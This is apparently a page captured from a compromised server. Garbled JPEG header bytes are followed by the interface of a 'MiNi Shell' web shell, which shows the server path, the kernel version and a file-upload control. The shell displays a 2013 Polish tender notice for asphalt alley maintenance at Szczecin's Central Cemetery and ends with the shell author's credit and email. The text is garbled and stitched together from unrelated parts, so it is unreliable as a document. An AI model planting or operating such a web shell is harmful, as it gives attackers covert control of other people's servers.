JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130917/376136-N-2013.html

<p class="kh_header"><b>Szczecin: BIEŻĄCA KONSERWACJA ALEJEK O NAWIERZCHNI BITUMICZNEJ NA TERENIE CMENTARZA CENTRALNEGO W  SZCZECINIE</b><br>
<b>Numer ogłoszenia: 376136 - 2013; data zamieszczenia: 17.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BIEŻĄCA KONSERWACJA ALEJEK O NAWIERZCHNI BITUMICZNEJ NA TERENIE CMENTARZA CENTRALNEGO W  SZCZECINIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest bieżąca konserwacja alejek o nawierzchni bitumicznej 
na terenie Cmentarza Centralnego w Szczecinie.   
	 	CPV: 
      98371111-5  Usługi utrzymania cmentarzy
      45233141-9  Roboty w zakresie konserwacji dróg
2.  Zakres rzeczowy zamówienia został określony w załączniku nr 11 do SIWZ i obejmuje 
 m. in:
1) 	nacięcie nawierzchni bitumicznej do 6 cm,
2)	frezowanie nawierzchni bitumicznej do 4 cm,
3)	ułożenie warstwy ścieralnej z MMA o grubości do 4 cm.
3. 	Lokalizacja alejek objętych przedmiotem zamówienia została zawarta w załączniku nr 10 
do SIWZ. 
4.  Wykonawca zobowiązany jest - na własny koszt i we własnym zakresie - również do:
	1)	organizacji prac i zaplecza socjalnego,
	2)	dysponowania minimum 2 brygadami do wykonania robót bitumicznych, przy czym każda brygada będzie składała się z co najmniej 3 osób,
	3)	zapewnienia ciągłej dostawy masy bitumicznej w trakcie realizacji prac,
	4)	wykonania oznakowania terenu prac zgodnie z obowiązującymi przepisami,
	5) 	zapewnienia bezpieczeństwa na terenie wykonywania prac zgodnie z przepisami p.poż. i bhp,
	6)	zabezpieczenia własnego mienia na terenie wykonywania prac,
      7)	uporządkowania terenu po realizacji prac.
5.   Zamawiający zobowiązuje się:
1)	dokonać odbioru wykonanych prac,
2)	zapewnić zapłatę wynagrodzenia za wykonane prace.
6. Wykonawca wykona przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy 	technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, 	m. in. m. in. ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), 
      a także z zapisami SIWZ i z ofertą, które będą stanowiły integralną część umowy.
7.	Podwykonawcy:
1)	Wykonawca może wykonać przedmiot zamówienia przy udziale podwykonawców, zawierając z nimi stosowne umowy w formie pisemnej pod rygorem nieważności,
2)	Zawarcie umowy z podwykonawcą wymaga zgody Zamawiającego przed jej zawarciem,
3)	Umowa z podwykonawcą musi zawierać:
a)	zakres rzeczowo - finansowy powierzony podwykonawcy,
b)	kwotę wynagrodzenia podwykonawcy,
c)	termin wykonania prac, 
4)	Wszelkie zmiany umów wymagają formy pisemnej i zgody Zamawiającego, pod rygorem nieważności,
5)	Zamawiający nie wyraża zgody na zawieranie umów przez podwykonawców 
z dalszym podwykonawcą,
6)	Zabezpieczenie ewentualnych roszczeń podwykonawców wobec Wykonawcy 
i Zamawiającego z tytułu zawarcia umowy, będzie potrącone z faktury Wykonawcy 
i zatrzymane na koncie Zamawiającego do czasu wypłaty przez Wykonawcę wynagrodzenia należnego podwykonawcy,
7)	Zwrot zabezpieczenia nastąpi z chwilą udokumentowania przez podwykonawcę otrzymania wynagrodzenia zgodnie z umową, przekazanego Zamawiającemu 
w formie jego oświadczenia,
8)	Niezależnie od uprawnień opisanych powyżej Zamawiający zastrzega sobie prawo dokonania zapłaty wynagrodzenia należnego podwykonawcy bezpośrednio na jego rachunek, na co Wykonawca wyraża zgodę,
9)	Wykonawca zobowiązany jest na żądanie Zamawiającego udzielić mu wszelkich informacji dotyczących podwykonawców,
10)	Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za roboty, które wykonuje przy pomocy podwykonawców, jak za działania własne,
11)	Zapisy pkt 6), 7) i 8) powyżej nie znajdą zastosowania, o ile Wykonawca wraz 
z fakturą za wykonane roboty dostarczy Zamawiającemu oświadczenie Podwykonawców o zapłacie na jego rzecz wierzytelności z tytułu robót zrealizowanych przez Podwykonawców.
8.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na:
1) 	zmianie terminu zakończenia realizacji,
2)	zmianie wynagrodzenia.



9.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty w przypadku:
1) 	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie prac zgodnie z zasadami współczesnej wiedzy technicznej
i obowiązujących przepisów; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin zakończenia przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy,
2)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da 	się  przewidzieć, np. huragan, powódź; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin zakończenia przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy,
3)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja 
ma wpływ na termin wykonania umowy; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin zakończenia przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy,
4)	zmiany sposobu przeprowadzenia prac, np. z powodu możliwości zastosowania innej, korzystniejszej ekonomicznie technologii niż ta, która była przewidziana do dnia składania ofert; W takim przypadku na uzasadniony wniosek Wykonawcy lub Zamawiającego zmiana zostanie potwierdzona aneksem do umowy,
5)	użycia innych materiałów (odpowiednio przy zachowaniu parametrów technicznych) powodujących obniżenie wartości prac, np. z powodu niedostępności na rynku materiałów, których użycie było przewidziane do dnia składania ofert; W takim przypadku na uzasadniony wniosek Wykonawcy lub Zamawiającego zmiana zostanie potwierdzona aneksem do umowy,
6)	konieczności wykonania prac, które ilościowo będą wykraczać poza ilość przyjętą 
w kosztorysie ofertowym, w oparciu o art. 630 Kodeksu cywilnego - Wykonawca może żądać zwiększenia wynagrodzenia. Rozliczenie wynagrodzenia nastąpi przy końcowym rozliczeniu przedmiotu umowy, przy czym zwiększenie wynagrodzenia będzie powodowało konieczność aneksowania umowy,
7)	w przypadku innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem umowy zgodnie z SIWZ. W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie potwierdzona aneksem do umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5, 45.23.31.41-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną główną usługę. 
Za główną usługę Zamawiający uzna pracę polegającą na bieżącej konserwacji, utrzymaniu w należytym stanie technicznym lub remoncie, nawierzchni bitumicznych, o wartości nie mniejszej niż 50 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, dysponuje lub będzie dysponować co najmniej następującym sprzętem:
     - 1 zestawem do układania masy bitumicznej (rozściełacz, walec stalowy, walec
        ogumiony),
	- 1 frezarką do frezowania nawierzchni,
	- 2 termosami do transportu masy bitumicznej,
	- 2 piłami do cięcia betonu,
	- 2 zagęszczarkami mechanicznymi,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, dysponuje lub będzie dysponować co najmniej kierownikiem prac - osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej;
Zgodnie z art. 104 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 
z 2010 r. Nr 243 poz. 1623 ze zmianami) osoby, które przed dniem wejścia w życie ustawy uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych 
w budownictwie, zachowują uprawnienia do pełnienia tych funkcji 
w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. 
Ponadto, zgodnie z art. 12a ustawy Prawo budowlane, samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
      1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
      2)	kosztorys ofertowy - zgodnie z załącznikiem nr 11 do SIWZ;
            W przypadku składania oferty wspólnej należy złożyć jeden dokument;
      3)	odpowiednie pełnomocnictwa;
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
      4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące część 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na:
1) 	zmianie terminu zakończenia realizacji,
2)	zmianie wynagrodzenia.



2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty w przypadku:
1) 	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie prac zgodnie z zasadami współczesnej wiedzy technicznej
i obowiązujących przepisów; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin zakończenia przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy,
2)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da 	się  przewidzieć, np. huragan, powódź; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin zakończenia przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy,
3)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja 
ma wpływ na termin wykonania umowy; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin zakończenia przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy,
4)	zmiany sposobu przeprowadzenia prac, np. z powodu możliwości zastosowania innej, korzystniejszej ekonomicznie technologii niż ta, która była przewidziana do dnia składania ofert; W takim przypadku na uzasadniony wniosek Wykonawcy lub Zamawiającego zmiana zostanie potwierdzona aneksem do umowy,
5)	użycia innych materiałów (odpowiednio przy zachowaniu parametrów technicznych) powodujących obniżenie wartości prac, np. z powodu niedostępności na rynku materiałów, których użycie było przewidziane do dnia składania ofert; W takim przypadku na uzasadniony wniosek Wykonawcy lub Zamawiającego zmiana zostanie potwierdzona aneksem do umowy,
6)	konieczności wykonania prac, które ilościowo będą wykraczać poza ilość przyjętą 
w kosztorysie ofertowym, w oparciu o art. 630 Kodeksu cywilnego - Wykonawca może żądać zwiększenia wynagrodzenia. Rozliczenie wynagrodzenia nastąpi przy końcowym rozliczeniu przedmiotu umowy, przy czym zwiększenie wynagrodzenia będzie powodowało konieczność aneksowania umowy,
7)	w przypadku innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem umowy zgodnie z SIWZ. W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie potwierdzona aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2013 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie dotyczy umowy ramowej.
2. Termin wykonania zamówienia: nie dłużej niż 30 dni kalendarzowych od dnia zawarcia umowy.
3. Wykonawca udzieli 36 miesięcy gwarancji i rękojmi na wykonany przedmiot zamówienia, licząc od dnia odbioru końcowego przedmiotu zamówienia.
4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Ponadto Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
1)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
3)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com